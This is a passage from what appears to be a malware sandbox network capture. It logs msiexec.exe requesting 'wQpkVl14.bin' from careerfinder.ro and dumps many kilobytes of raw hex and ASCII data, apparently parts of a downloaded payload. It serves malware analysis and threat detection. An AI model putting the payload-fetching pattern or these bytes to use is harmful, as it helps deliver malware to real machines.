                                                                  Data Ascii: 76Lk15I9ph3I3S2K85GWiW4lMbOumkDfMmMiSBYv1uglchIeJdpTSIjbDggm7GRwtMzLPlt+RSYxYFnyuWRQzGmCth/gP+jJt2/ZW5s6izMHIojC5YEPml4SYiVA9OgmMtU8JAVdjoMy7D8DJawsI88Y2wBPm5SJ+bsDlc0v3xmfZ+qjNz5hHu/4V97gP2Ee4D9hHuA/YR7gP2Ee4D9hHuA/YR7gP2EBMLGVVKfjSx2oJas07z5yXuA/YR7gP2E
                                                                  2024-10-16 11:07:27 UTC16384INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 77 5a 79 41 46 50 32 45 65 34 44 39 68 48 75 41 2f 59 52 37 67 50 32 45 65 34 44 39 68 48 75 41 2f 59 52 37 67 50 32 45 65 35 32 64 32 74 42 2b 55 36 6d 4d 6e 4a 45 6d 35 36 6f 4b 41 72 5a 65 52 47 4c 4e 53 62 4f 71 44 41 44 35 68 48 69 77 56 74 51 70 30 4c 4c 61 51 52 50 72 47 35 46 75 43 34 62 6a 66 67 57 76 4e 4e 58 42 77 69 4e 68 30 55 6d 30 74 72 45 49
                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwZyAFP2Ee4D9hHuA/YR7gP2Ee4D9hHuA/YR7gP2Ee52d2tB+U6mMnJEm56oKArZeRGLNSbOqDAD5hHiwVtQp0LLaQRPrG5FuC4bjfgWvNNXBwiNh0Um0trEI
                                                                  2024-10-16 11:07:27 UTC16384INData Raw: 6e 44 73 46 63 66 33 4e 50 76 61 65 49 32 41 65 4c 42 39 6c 36 58 44 43 68 4c 74 79 48 6f 32 35 57 35 31 46 72 45 77 33 61 67 61 64 4a 7a 31 57 63 46 6e 42 4a 6d 38 75 64 51 37 41 51 63 65 62 4d 6a 44 6c 71 65 49 2f 59 5a 63 7a 50 71 72 5a 5a 62 64 67 48 75 42 7a 2f 77 44 34 38 33 58 76 4f 63 43 4e 47 55 41 6c 42 45 35 77 54 33 73 31 4c 61 73 70 6d 49 65 66 41 30 79 71 41 4b 47 7a 4a 50 32 73 58 50 70 43 48 61 7a 54 48 69 6a 52 4f 58 6b 77 70 7a 4c 52 4c 2b 74 68 7a 75 72 66 54 61 62 67 39 77 45 59 67 6e 4a 70 44 6b 69 71 50 45 65 46 38 42 6c 4d 6b 45 48 6a 54 51 4c 6a 62 48 57 68 4f 39 43 6f 46 52 31 58 61 30 68 58 50 4c 57 74 47 50 42 71 75 32 79 65 31 67 72 63 5a 50 48 51 31 41 74 39 63 52 38 51 4d 77 74 57 7a 32 62 67 71 32 67 2b 59 52 35 33 42 4f 65
                                                                  Data Ascii: nDsFcf3NPvaeI2AeLB9l6XDChLtyHo25W51FrEw3agadJz1WcFnBJm8udQ7AQcebMjDlqeI/YZczPqrZZbdgHuBz/wD483XvOcCNGUAlBE5wT3s1LaspmIefA0yqAKGzJP2sXPpCHazTHijROXkwpzLRL+thzurfTabg9wEYgnJpDkiqPEeF8BlMkEHjTQLjbHWhO9CoFR1Xa0hXPLWtGPBqu2ye1grcZPHQ1At9cR8QMwtWz2bgq2g+YR53BOe
                                                                  2024-10-16 11:07:27 UTC16384INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 42 48 67 4c 55 30 65 34 44 39 68 48 75 41 2f 59 52 37 67 50 32 45 65 34 44 39 68 48 75 41 2f 59 52 37 67 50 32 45
                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABHgLU0e4D9hHuA/YR7gP2Ee4D9hHuA/YR7gP2E
                                                                  2024-10-16 11:07:27 UTC16384INData Raw: 6e 55 39 36 75 65 41 2f 62 70 47 63 79 6d 49 65 59 54 34 33 32 78 67 74 34 43 39 31 6c 6a 46 33 59 4d 4a 32 6e 39 48 75 6f 54 4b 65 42 37 43 58 64 66 42 67 48 75 43 2f 6e 6f 74 61 47 66 31 35 4d 4c 36 61 52 2f 77 36 49 79 59 78 76 70 4d 58 34 68 42 55 4a 68 32 2b 6b 7a 2b 74 61 2f 73 6d 4d 4c 36 54 46 44 4d 6a 48 69 59 64 57 5a 62 59 6b 34 4e 67 7a 32 75 71 72 68 2f 67 50 77 63 6a 41 74 59 48 6d 79 48 34 59 43 78 39 64 6c 6d 66 79 52 5a 76 42 2b 65 2b 55 43 2f 68 71 4c 4b 66 79 57 52 7a 65 54 48 57 73 52 37 67 50 77 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                  Data Ascii: nU96ueA/bpGcymIeYT432xgt4C91ljF3YMJ2n9HuoTKeB7CXdfBgHuC/notaGf15ML6aR/w6IyYxvpMX4hBUJh2+kz+ta/smML6TFDMjHiYdWZbYk4Ngz2uqrh/gPwcjAtYHmyH4YCx9dlmfyRZvB+e+UC/hqLKfyWRzeTHWsR7gPwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                  2024-10-16 11:07:27 UTC16384INData Raw: 56 55 52 6a 48 75 44 4e 32 2b 54 34 57 65 44 6e 6c 6b 66 6c 33 6d 47 4b 47 68 7a 67 50 31 79 36 2f 6f 6c 59 78 32 47 53 47 68 7a 67 50 35 79 2f 31 67 59 6a 34 57 31 45 59 78 37 67 53 70 5a 63 49 77 61 35 6d 67 63 48 6a 70 57 38 47 32 58 5a 34 77 6a 71 5a 31 31 5a 6c 74 69 73 72 4f 41 74 55 42 31 65 78 57 58 38 34 43 31 4e 71 73 58 56 68 72 71 34 6e 38 75 48 57 76 78 4e 79 4b 4e 2b 34 4b 30 78 6e 79 4d 30 76 39 33 67 76 6f 6f 5a 50 76 78 68 65 47 58 38 70 68 32 74 51 52 69 53 32 4d 4a 5a 78 6d 45 4d 57 32 4a 44 33 31 6e 63 59 51 7a 61 77 57 59 43 34 43 33 79 6a 45 7a 35 46 76 79 70 6c 32 56 5a 59 78 37 67 57 5a 62 64 4b 32 2f 5a 72 74 74 48 75 4a 6f 70 4f 73 59 6f 65 4d 74 55 49 6c 64 33 50 54 4f 48 2b 6a 6d 4d 34 66 7a 71 6d 34 59 39 59 52 34 57 2b 56 72
                                                                  Data Ascii: VURjHuDN2+T4WeDnlkfl3mGKGhzgP1y6/olYx2GSGhzgP5y/1gYj4W1EYx7gSpZcIwa5mgcHjpW8G2XZ4wjqZ11ZltisrOAtUB1exWX84C1NqsXVhrq4n8uHWvxNyKN+4K0xnyM0v93gvooZPvxheGX8ph2tQRiS2MJZxmEMW2JD31ncYQzawWYC4C3yjEz5Fvypl2VZYx7gWZbdK2/ZrttHuJopOsYoeMtUIld3PTOH+jmM4fzqm4Y9YR4W+Vr
                                                                  2024-10-16 11:07:27 UTC16384INData Raw: 46 4c 70 2f 6e 79 61 6a 46 44 31 4d 74 6e 63 6a 78 5a 67 4b 52 2b 54 6c 33 72 56 63 6b 2f 4c 6e 58 36 79 42 6d 6d 63 4e 50 55 4c 32 4d 64 50 4b 63 6f 72 6e 76 66 59 37 62 45 31 37 69 54 2f 32 53 32 70 69 48 6d 74 34 58 5a 57 39 48 32 44 64 59 2f 67 68 64 72 58 6b 4a 4a 4a 68 43 30 56 35 6d 56 52 77 6e 39 51 62 6c 74 51 32 31 4b 30 7a 54 63 6a 73 43 34 63 68 77 54 48 65 59 33 63 66 63 62 7a 32 4f 70 37 54 4f 41 62 71 46 76 6f 75 73 32 31 4f 43 47 30 68 76 42 4b 4c 4d 67 62 73 76 77 46 42 36 50 6d 62 7a 30 68 65 4b 51 32 6d 31 4c 36 58 30 58 4f 53 45 5a 38 57 6b 53 39 43 78 62 36 58 4f 71 6c 44 53 35 38 57 6a 67 55 72 71 37 5a 2f 61 51 51 4b 6f 55 52 4c 6e 6a 38 50 54 71 54 6e 50 30 31 36 41 30 78 70 74 4a 45 6c 66 76 6b 65 77 52 78 66 6c 67 4c 68 71 71 2f
                                                                  Data Ascii: FLp/nyajFD1MtncjxZgKR+Tl3rVck/LnX6yBmmcNPUL2MdPKcornvfY7bE17iT/2S2piHmt4XZW9H2DdY/ghdrXkJJJhC0V5mVRwn9QbltQ21K0zTcjsC4chwTHeY3cfcbz2Op7TOAbqFvous21OCG0hvBKLMgbsvwFB6Pmbz0heKQ2m1L6X0XOSEZ8WkS9Cxb6XOqlDS58WjgUrq7Z/aQQKoURLnj8PTqTnP016A0xptJElfvkewRxflgLhqq/
                                                                  2024-10-16 11:07:27 UTC16384INData Raw: 68 46 78 7a 77 62 59 72 5a 6a 51 52 48 75 66 51 56 62 71 67 52 4e 6a 49 4f 4b 58 44 46 6b 5a 7a 4c 48 74 59 77 64 55 6c 32 70 31 76 31 52 45 73 73 56 43 38 63 67 6d 39 6f 6e 53 41 71 2b 32 58 4e 4b 65 2f 6b 63 44 4d 44 77 51 36 6d 49 65 41 39 44 34 73 39 2b 4b 2b 6b 6b 33 56 53 31 33 74 37 2f 68 57 48 75 41 2f 59 52 37 67 50 32 45 65 34 44 39 68 48 75 41 2f 59 52 37 67 50 32 45 65 34 44 39 68 48 75 41 2f 66 75 69 53 6f 32 4e 54 4d 39 47 64 6a 39 77 5a 2b 70 38 54 4d 57 30 79 47 66 4e 61 75 74 4f 2f 46 4a 4a 4f 42 44 39 41 52 71 54 73 4d 63 6d 56 5a 53 4d 69 30 56 4f 76 77 57 39 7a 41 48 58 64 37 32 48 6a 74 48 41 6e 4a 78 53 47 66 44 62 34 4d 50 33 52 6d 76 62 58 55 72 36 4b 59 76 42 41 79 55 6c 66 49 6e 32 47 47 62 36 4f 38 55 4a 66 5a 5a 38 6e 44 73 5a
                                                                  Data Ascii: hFxzwbYrZjQRHufQVbqgRNjIOKXDFkZzLHtYwdUl2p1v1REssVC8cgm9onSAq+2XNKe/kcDMDwQ6mIeA9D4s9+K+kk3VS13t7/hWHuA/YR7gP2Ee4D9hHuA/YR7gP2Ee4D9hHuA/fuiSo2NTM9Gdj9wZ+p8TMW0yGfNautO/FJJOBD9ARqTsMcmVZSMi0VOvwW9zAHXd72HjtHAnJxSGfDb4MP3RmvbXUr6KYvBAyUlfIn2GGb6O8UJfZZ8nDsZ
                                                                  2024-10-16 11:07:27 UTC16384INData Raw: 6c 38 2b 6f 6e 79 4d 37 6b 4d 51 56 75 35 36 66 49 79 59 6d 58 43 34 48 75 33 68 68 78 52 62 63 73 37 54 38 59 75 49 2f 59 65 47 31 47 7a 74 48 5a 4f 77 35 6d 7a 67 47 6f 4a 32 63 47 32 30 66 37 37 73 4e 48 2b 41 2f 69 4f 4c 67 50 32 45 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                  Data Ascii: l8+onyM7kMQVu56fIyYmXC4Hu3hhxRbcs7T8YuI/YeG1GztHZOw5mzgGoJ2cG20f77sNH+A/iOLgP2EAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  1192.168.2.549870185.248.196.64436764C:\Windows\SysWOW64\msiexec.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-10-16 11:08:13 UTC167OUTGET /rs/wQpkVl14.bin HTTP/1.1
                                                                  User-Agent: 5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                  Host: careerfinder.ro
                                                                  Cache-Control: no-cache
                                                                  2024-10-16 11:08:13 UTC459INHTTP/1.1 200 OK
                                                                  Connection: close
                                                                  cache-control: public, max-age=0
                                                                  expires: Wed, 16 Oct 2024 11:08:13 GMT
                                                                  content-type: application/octet-stream
                                                                  last-modified: Tue, 15 Oct 2024 11:02:27 GMT
                                                                  accept-ranges: bytes
                                                                  content-length: 494656
                                                                  date: Wed, 16 Oct 2024 11:08:13 GMT
                                                                  alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                  2024-10-16 11:08:13 UTC16384INData Raw: 05 c4 72 94 9e a9 1d 21 ec 0d 01 bf 1f 68 34 c8 0c 34 b2 d5 70 24 f4 b8 da 0a 65 6d bd ec 5d 01 9b 07 29 a8 ad dd 41 05 1d 7b f7 c7 d7 5e 4f 52 34 63 d1 4d 9c 7b c2 da 76 cf f7 ae 22 08 80 ef 3b be 29 04 3f c1 29 56 bf d1 ba 64 c1 e3 44 be a8 0a 47 f6 d2 a3 49 53 5a c6 e4 a2 c0 bb 96 76 06 8d c0 3f c3 a5 43 8a 48 6a 07 24 d8 0a 73 f5 76 65 96 50 7e d8 82 41 95 1c 13 b8 4b 0a 89 cf df 56 1d 05 4f 58 11 e7 97 0f de 3a 39 96 eb ae bb a8 f8 f7 ba 2e 7f d9 83 42 7c 8d d9 18 a3 33 b1 5b 01 c9 ff c8 fe 47 de 1b 82 4f d1 52 24 63 ab 22 fc 25 be 8b 03 fd 00 4e e8 58 b7 a0 15 4d 5d db f5 ed 49 5d fd 4b c3 b6 c8 12 ee 56 2a d8 d1 9a b9 6f 58 0a d2 07 4d 77 35 1e 21 db 23 8a 85 a7 db ad 17 50 73 84 5c 78 3d 6b 03 f9 c7 83 c3 e7 b1 3d ac e2 47 2a 7e 49 4f 10 fd 53 9d
                                                                  Data Ascii: r!h44p$em])A{^OR4cM{v";)?)VdDGISZv?CHj$sveP~AKVOX:9.B|3[GOR$c"%NXM]I]KV*oXMw5!#Ps\x=k=G*~IOS
                                                                  2024-10-16 11:08:14 UTC16384INData Raw: 98 29 0d 08 ba 4b c5 a1 da ef 0f 5d a2 6f 1c 9d e7 38 62 2e 80 8c ec 48 b3 46 61 7a f4 43 cb 2b bd e6 0c f0 30 9e e2 c7 de dc d2 22 b9 b7 c9 1b 30 b2 a0 1d 9d 9d a3 41 b7 cf cb 90 41 ff 13 a1 38 bb 4c f1 95 d6 87 0d b3 54 a5 61 03 b3 2a 51 9d dd 3d d3 d8 58 fc 21 75 6a d1 80 dd 79 d9 50 29 d0 cf 07 e5 04 15 8f c7 30 9a e6 cc b1 41 10 d0 fa 29 b5 a2 c6 1c 70 85 a5 55 a8 57 64 8f fa 32 2f 0b 6a 91 a6 e7 88 7e e9 98 0d 5b d5 9c 17 e9 ce d5 61 3a dd 14 ca 45 a1 39 4e 02 e0 71 fd ab ba bc ae 2c 02 57 8b 5f 4c a6 d1 30 5c a2 6d a4 45 84 d3 30 f3 ce 45 7c 32 58 a6 d8 c5 e6 51 1a 36 5f 76 a7 1c 92 fe 4a 9c 80 ab e4 5e 06 db 91 4d 08 7a d4 24 b5 9f 31 e2 0b c5 67 e0 87 05 f2 42 bd 29 11 d8 09 aa 3d 69 61 ca ff 7d 36 3b 03 a8 23 5e c2 13 89 80 29 d8 3d f8 3b 57 f0
                                                                  Data Ascii: )K]o8b.HFazC+0"0AA8LTa*Q=X!ujyP)0A)pUWd2/j~[a:E9Nq,W_L0\mE0E|2XQ6_vJ^Mz$1gB)=ia}6;#^)=;W
                                                                  2024-10-16 11:08:14 UTC16384INData Raw: 3f 24 03 8d 6c a6 8c 80 92 71 ca 11 d4 75 b7 94 53 7b 3c f8 be ea 9b 6b 7c f2 5f 4d 1e 60 5d 8d 3a 9d 55 1d a5 41 86 53 5e 74 20 79 8a d4 51 7e f1 fe d9 24 dc 63 1f 29 31 fc 5e d9 f9 e9 74 5e e8 e3 e5 ba bc 96 01 06 12 9a cc cb 39 06 e8 16 18 64 0e 4e aa 9f 94 a0 08 6d a1 04 b8 c5 15 f8 6f 53 e6 bb ad b6 ee 8b cf 76 98 9e 5d 35 e7 de e0 92 d6 10 ba a6 7e 55 3c db db 04 e0 25 e1 35 54 31 0e 74 ac bf 23 40 b3 cb de 1f 3c b7 e5 89 9e b9 d5 f5 96 98 20 95 dd 24 29 ab a0 e0 5d 20 e3 3d ee ba 89 19 c3 32 46 d7 b4 3b 10 1b 6c 3d ba 59 1a c4 e6 9f 65 16 a1 1e 7e cf ee 28 12 30 e7 99 9a 3e 78 e3 21 21 13 1e e4 1d 54 7e 7f 30 58 46 47 c4 47 15 ee 56 7a c1 87 25 76 d2 6d 73 e6 de 6d 1c db 28 44 c5 5f 9b 59 04 74 2a 95 1d 67 68 6e 5e 5c d8 32 19 a8 d7 09 7c 71 da 93
                                                                  Data Ascii: ?$lquS{<k|_M`]:UAS^t yQ~$c)1^t^9dNmoSv]5~U<%5T1t#@< $)] =2F;l=Ye~(0>x!!T~0XFGGVz%vmsm(D_Yt*ghn^\2|q
                                                                  2024-10-16 11:08:14 UTC16384INData Raw: c4 de 8e 7f e3 c7 64 3d f5 04 1a da 2f e1 7e cf a4 ba 0e 9a 7e ce 9a 04 72 60 6a f8 8e f1 66 d6 b7 b7 d4 ae 60 d6 e9 4a b6 2a 6e f7 fe d8 a3 9a b4 52 fd 50 4f 25 6b 31 9d 30 96 14 de 79 7b 59 9e a1 c2 b4 d0 b1 6f 75 bc c6 3d b6 9d 2f f8 c5 13 22 73 5c 11 ee 63 05 1d 7f f7 88 1c 6f 74 36 af 32 4a e3 2e 17 49 a7 65 38 65 f9 8b 78 cc 93 a2 25 af 26 37 07 a0 ba be 4b a8 8d 19 d3 d5 74 5c fe 97 03 fa a4 e4 30 a3 10 a4 33 d6 6c 83 3c 48 bc 6f 55 8c 7a e7 63 1c 00 63 8a 30 c9 16 c3 a8 40 b8 30 63 72 44 97 ab ea 48 dc d6 c0 2f d6 35 21 81 8d 97 ea 7c e4 2f 22 be 43 6e c8 7e a2 88 e1 0f cf 70 32 93 92 90 f2 bf 35 62 a4 a5 53 e4 5b 79 b8 57 55 f2 9a 22 61 1b ff 58 c6 df 7f 2a 0b 8b e4 09 a8 8d 7c e2 67 0d 4f 58 a3 ec ab 5a f7 b5 a4 5d 47 96 9b 43 b2 e0 b3 ee 8c 2f
                                                                  Data Ascii: d=/~~r`jf`J*nRPO%k10y{You=/"s\cot62J.Ie8ex%&7Kt\03l<HoUzcc0@0crDH/5!|/"Cn~p25bS[yWU"aX*|gOXZ]GC/
                                                                  2024-10-16 11:08:14 UTC16384INData Raw: de c3 d7 9b 32 d7 87 f1 7f ca 2c db 10 a6 6c a3 e0 c2 de 52 82 fe 2f e6 5e 9b 7f 72 d0 83 65 b3 a6 5c dd 8d c1 d5 3c c1 57 28 52 87 96 08 77 cf 91 c8 11 6a 86 2b 2d 4c 1f 9d ee c9 ec 45 aa bb 6f 88 1e ab 37 6e d8 7f a4 6c 22 ac 34 1a 75 2f e3 5b cc 65 8a f7 ed 12 87 e4 2f 28 6c 52 5d 39 99 ad 9d c9 af ef b7 68 ed 19 9a 94 98 fb 72 22 de e2 e5 71 b5 b3 92 66 c9 a6 ed 98 0c e7 6b f4 62 c9 8c 7c c7 41 cc fa e8 0e 88 10 d3 10 c1 d2 9d fa 5f 6c 1f 58 4d aa 57 4a c7 54 3e 2b 95 5a 13 6b e6 33 af d7 01 fd 63 e6 82 2a 70 8f 75 e1 60 f1 a0 6d 38 3e 29 05 2d 6d bc d0 6e 4a 42 50 36 2f 5e f6 e9 ce 5b be 18 77 b9 a2 a6 97 df 2b ce ad 4c bb 64 49 55 27 61 34 35 00 25 4d 7a 43 68 47 05 fd a2 8e 1a 80 3c 3d b5 17 f8 06 34 58 21 0e 74 5b a7 7a e2 5d e1 81 36 d6 5c a8 cb
                                                                  Data Ascii: 2,lR/^re\<W(Rwj+-LEo7nl"4u/[e/(lR]9hr"qfkb|A_lXMWJT>+Zk3c*pu`m8>)-mnJBP6/^[w+LdIU'a45%MzChG<=4X!t[z]6\
                                                                  2024-10-16 11:08:14 UTC16384INData Raw: 36 4f d1 3f f1 6a 09 62 98 ac 4f a5 b7 9d de 0a 43 bf 63 e7 2d 42 7d 04 ce bd 13 d8 8a e2 90 97 dd 05 14 76 3f 36 b7 2a 50 dd b5 91 b4 ae 9c 39 5c ea c9 95 cb b6 cc ce 06 04 8c 30 df 14 c9 35 17 c6 66 38 47 40 c9 59 fd de cd d7 3d 73 7a d9 da 81 a7 29 bd 2d d2 30 29 d3 26 a8 52 f9 9b c8 5d 68 b3 55 e9 9b 91 be 0e 1d 28 e8 88 71 d0 c6 ca 71 47 83 47 47 06 80 de 2c 95 6f f1 61 b9 17 c5 bb 3d ce b8 f4 1c a7 62 05 b0 fb 30 9e b4 5d 52 6e ea bd d0 05 a6 6c 69 0a 48 da 84 66 13 12 16 95 d3 7e 69 40 a8 f9 42 88 f3 d4 73 8b 21 b4 71 1c 49 92 57 5f 39 5f f2 6e b9 04 3c 44 c4 59 3f 53 ba 64 3e 13 f3 f0 12 83 0b d2 f6 55 8a 5b 6e c5 b5 49 ed d1 96 2c f0 4e d0 87 ef 63 05 8a 47 2e c5 74 d7 bd b2 a5 89 70 0e c4 3b d8 07 81 e1 10 98 b8 d6 cb fd c9 58 0d 83 1b a4 ca e7
                                                                  Data Ascii: 6O?jbOCc-B}v?6*P9\05f8G@Y=sz)-0)&R]hU(qqGGG,oa=b0]RnliHf~i@Bs!qIW_9_n<DY?Sd>U[nI,NcG.tp;X
                                                                  2024-10-16 11:08:14 UTC16384INData Raw: 84 45 f0 63 eb c4 ee b8 76 0e df 29 0f 30 f9 89 31 79 a2 17 25 67 a1 7d bd ef bd 39 1d 13 8e 78 41 9d 09 db 1e 17 4d 6f ea 52 4d 00 2b 95 4d 4d 63 37 66 63 35 e4 93 59 c1 a8 82 05 a5 ea d9 45 10 ec ba b7 f1 10 53 38 97 a3 0b 6c f9 b5 94 41 c1 5d 77 51 3e 77 43 c7 a7 35 d1 45 0a 48 a7 1c 07 6e df 94 80 de 4b 97 23 4a 60 cd ba 6d ad 06 fe 53 66 0d 78 34 27 6d 31 5c 02 7c a8 b4 00 24 8c 32 af b9 a2 41 38 7a 6c 68 52 cd 0b dc dc ab 93 bd ce 7b d3 e0 05 e6 88 b8 31 88 14 51 4e ab 49 ab 6c 7a dd 88 cf 47 ea d9 f2 ae 8d 95 78 16 1f 25 77 0a 89 b3 f5 bd d0 07 fa 2a 6e e3 d9 79 07 01 16 e3 c7 c7 e9 11 24 62 5c 1c 18 a4 2a 9b b2 4d a3 4f a7 22 c2 9c 23 78 d8 40 bc b7 ce 12 63 c3 1d f0 9c d8 9e 4e 54 9c 46 70 2b bb ac 48 e0 d4 56 57 dc 36 87 9a c4 99 35 70 7b eb 17
                                                                  Data Ascii: Ecv)01y%g}9xAMoRM+MMc7fc5YES8lA]wQ>wC5EHnK#J`mSfx4'm1\|$2A8zlhR{1QNIlzGx%w*ny$b\*MO"#x@cNTFp+HVW65p{
                                                                  2024-10-16 11:08:14 UTC16384INData Raw: ca 5c 9a 2b 1b 69 4e 0b 20 d6 da 85 81 c7 05 5f b1 fe 86 53 cf 8a 7d 31 2e 6d 8e d3 4b 82 7a 49 24 75 eb cc 9a 2c b2 62 03 20 2f f3 36 ec 22 58 3c f6 6f c2 fe 94 df fd 2a 46 13 53 e0 25 2a 2b f2 6d 6a ba 00 4d c5 9d 69 33 3d 61 4c b3 b4 7f 8c 61 8e 7c 63 45 25 c4 0a 1a 12 5f 29 24 3d ea 46 a7 9f 90 27 37 ce 28 10 53 41 bb ef 3d c7 44 34 18 8c 89 ea f8 17 cc af cd 4f 61 a0 e0 8c 7f 16 74 63 90 fc 60 3a 97 77 0b c4 b2 f9 ea 52 20 0e cc 3b 5e e1 3a 81 56 04 f5 25 d1 0b 59 02 24 6d b6 e0 f2 67 07 42 b0 14 ee 31 8a dc 0b 97 6e bb ac 15 bd b7 ae 74 2c b7 97 aa 6c d4 32 25 f8 3a f3 44 84 bb 1e c6 9e 77 cb 0e b1 79 9f 83 8e f2 2a 92 cf 34 89 45 34 29 53 ad 51 74 0e 11 ff d7 ce 98 f3 ca 1a 7a 13 2f 12 cc 60 03 59 50 39 52 74 db fb 33 f8 52 c7 6c 3d ab 03 ad d7 f0
                                                                  Data Ascii: \+iN _S}1.mKzI$u,b /6"X<o*FS%*+mjMi3=aLa|cE%_)$=F'7(SA=D4Oatc`:wR ;^:V%Y$mgB1nt,l2%:Dwy*4E4)SQtz/`YP9Rt3Rl=
                                                                  2024-10-16 11:08:14 UTC16384INData Raw: 69 af f4 8e a9 ad 79 43 e0 37 20 38 9d 39 39 e9 43 35 f1 44 4b f7 09 e0 14 50 42 13 d7 3e 54 6d 54 e6 1f 34 35 cd 14 af d7 db be ad e8 1e b3 ff 97 cb a4 b1 b1 f3 d2 82 af f2 37 38 da 5b 47 83 f1 9b 01 06 dd dc da b3 5a 65 ce 4b f2 15 77 80 40 f2 95 b7 e3 8f ca 9c 59 ec ee 9b 1e 15 dd f5 4c 16 8e 1f 78 2f 71 e5 19 0f fc fc 01 85 35 e2 1a 79 ee 03 90 c4 03 4d b0 aa 76 a5 f2 e2 68 56 27 08 19 2f f3 63 c8 d4 2f 75 66 ae 79 e0 bc 0f 00 18 fe a8 66 c6 36 3e 83 29 83 ff 68 e3 6e 86 2d 0b 84 a9 a5 27 29 d9 55 90 98 81 c0 d8 94 ba 39 bb 16 14 0b 40 85 a6 96 ad 26 d3 8e ec 5c ec be 14 2e b8 ec 4f bd 6a 4a 22 25 d7 be 10 7a 2e b9 02 d3 8c f5 8f 9d 35 e9 48 43 1c f9 c5 de ca 71 6e 75 72 f4 9c 9a b8 3e 88 24 21 30 35 c6 52 e5 8f bf ec f9 da d5 aa 2f 97 39 21 6b 04 87
                                                                  Data Ascii: iyC7 899C5DKPB>TmT4578[GZeKw@YLx/q5yMvhV'/c/ufyf6>)hn-')U9@&\.OjJ"%z.5HCqnur>$!05R/9!k
                                                                  2024-10-16 11:08:14 UTC16384INData Raw: 0f 12 c3 37 3f b9 31 61 c9 ce 58 16 07 33 c9 50 2a 0b 6d fa d6 1a ab 17 49 3e 76 32 ed 04 8d dd 16 f9 82 65 94 d1 d2 c0 cc 7e 0a a7 99 4f 1a cf ba 82 2d 98 c0 35 c3 6d 74 ad da 91 5e 54 dd ab 55 f0 fe e2 42 90 30 c5 64 ef 8c 8c b3 44 c9 e1 0c 5e 04 a9 37 e5 0e d3 34 58 28 9c ef b9 03 20 cc 3b 00 92 26 87 58 37 0f ef 0b 6f 58 67 d4 99 62 2a 89 fe ee 99 33 e3 aa db be d6 e1 4b 83 d8 6f 40 ed 44 3d b4 ae a7 e7 3d 98 f6 77 d2 e9 09 c1 f8 7f a4 48 08 75 38 35 4e 91 b6 80 f9 c3 21 e9 4c 4e 0c 1f 5d 66 4b c3 b7 fd 6a 83 23 ca c7 41 db 45 8a bc f2 57 9e 8c 55 d2 9f 95 77 a9 0b 13 db 23 6f bf 0a a6 d0 93 4f 43 c3 2a 7c ac 0e 6e 50 d8 2c 6c 5a d8 35 99 3c 47 c5 17 ec 